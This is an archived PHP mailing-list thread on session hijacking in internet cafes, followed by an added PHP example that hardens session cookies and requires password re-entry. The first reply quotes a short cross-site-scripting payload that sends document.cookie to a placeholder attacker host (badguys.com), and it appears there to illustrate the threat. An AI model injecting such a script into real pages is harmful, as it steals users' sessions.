Well, that is not a solution. Session hijacking is a common and relatively easy attack, not only in internet cafes; you can also do it using JavaScript, and not even Firefox or Opera protects against session hijacking.
This can steal the session from your server:
 <script>
document.location =
   'http://www.badguys.com/cgi-bin/cookie.php?' +
   document.cookie;
</script>
So if you are talking about your own application and how to protect it from session hijacking, there are lots of things you need to do besides using SSL and cryptography. For instance, in the user management section you have to have the user enter their old password in order to get a new password, and challenge users to re-enter their password to access critical pages, like the purchase pages for adding a new credit card, etc. If I wanted to answer your question I would need to write 100s of pages, but session hijacking is a huge topic and you can read about it on the internet.
If your worst fear is internet cafes, here is my advice: do not access vulnerable sites, and don't go to untrusted internet cafes for purchases or critical stuff.
 
 
--Zaid
 
On 2/26/06, Ala'a Ibrahim <[EMAIL PROTECTED]> wrote:
Well,
That would sound great when I tell it to the clients, of course after giving them 10000 lectures so they would understand what the hell I'm talking about ... :p


On 2/26/06, Al-Faisal El-Dajani <[EMAIL PROTECTED] > wrote:
I have an idea, but I'm not sure of its validity...

Why don't you bring a flash disk with you that has Firefox on it, and use it to browse the internet?
That way all related files/cookies/stuff would be on your flash, right?

On 2/26/06, Ala'a Ibrahim < [EMAIL PROTECTED] > wrote:
Dear Group,
Imagine this situation: you are in an Internet cafe and you logged in to some account on the internet (even if it was HTTPS). A cookie, or a session ID cookie, would be put on your computer; in IE the cookies would be put in some file on your computer. Now if the Internet cafe supervisor got into your computer, he can read all the cookies he wants and then set them on his machine, and (in the case of sessions) he could use your account until one of you logs out (in the case of cookies, it's gone forever).
Does anybody know a way to solve that ...

PS: in the Internet Cafe you both have the same IP, so it's useless to try to save the IP in your session.
My best solution is to tell everybody not to go to internet cafes ....
--
                                 Ala'a A. Ibrahim
http://alaa83.blogspot.com/

_______________________________________________
Jordan PHP Users Group
http://php.jolug.org/
Php mailing list
[email protected]
http://mail.jolug.org/mailman/listinfo/php_jolug.org





--
Al-Faisal El-Dajani
Tel: +962-7-77 799 781
URL: http://www.linuxhome.trickip.net
P.O Box: 140056
11814 Amman, Jordan

May the source be with you
--
                                 Ala'a A. Ibrahim
http://alaa83.blogspot.com/
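
The application-side measures from the first message in the thread, as an added PHP example that is not part of the original posts: the session cookie is marked HttpOnly so the `document.cookie` script quoted above cannot read it, the old password is required for a password change, and critical pages demand a recent password check. The function names, the 300-second window and `/reauth.php` are assumptions made for illustration.

```php
<?php
// Added example, not code from the thread. Requires PHP 7.3+ (array form of
// session_set_cookie_params). Function names and /reauth.php are hypothetical.
declare(strict_types=1);

const REAUTH_WINDOW = 300; // assumed: seconds a password check stays valid

function start_hardened_session(): void
{
    session_set_cookie_params([
        'lifetime' => 0,        // cookie is dropped when the browser closes
        'path'     => '/',
        'secure'   => true,     // sent over HTTPS only
        'httponly' => true,     // hidden from document.cookie
        'samesite' => 'Strict', // not attached to cross-site requests
    ]);
    session_start();
}

// Call after every successful password check (login or re-entry).
function mark_authenticated(int $userId): void
{
    session_regenerate_id(true); // a session ID copied earlier stops working
    $_SESSION['user_id']   = $userId;
    $_SESSION['auth_time'] = time();
}

// Gate for critical pages: the password must have been entered recently.
function has_recent_auth(array $session, int $now): bool
{
    return isset($session['user_id'], $session['auth_time'])
        && ($now - $session['auth_time']) <= REAUTH_WINDOW;
}

// Password change: a stolen session alone is not enough, the old password must verify.
function change_password(string $storedHash, string $old, string $new): ?string
{
    return password_verify($old, $storedHash)
        ? password_hash($new, PASSWORD_DEFAULT)
        : null;
}

// Usage at the top of a critical page such as "add credit card".
start_hardened_session();
if (!has_recent_auth($_SESSION, time())) {
    header('Location: /reauth.php'); // ask for the password again
    exit;
}
```

None of this helps once the cookie file itself is copied from a shared machine while the session is still live; the re-entry window only limits what such a copied session can reach.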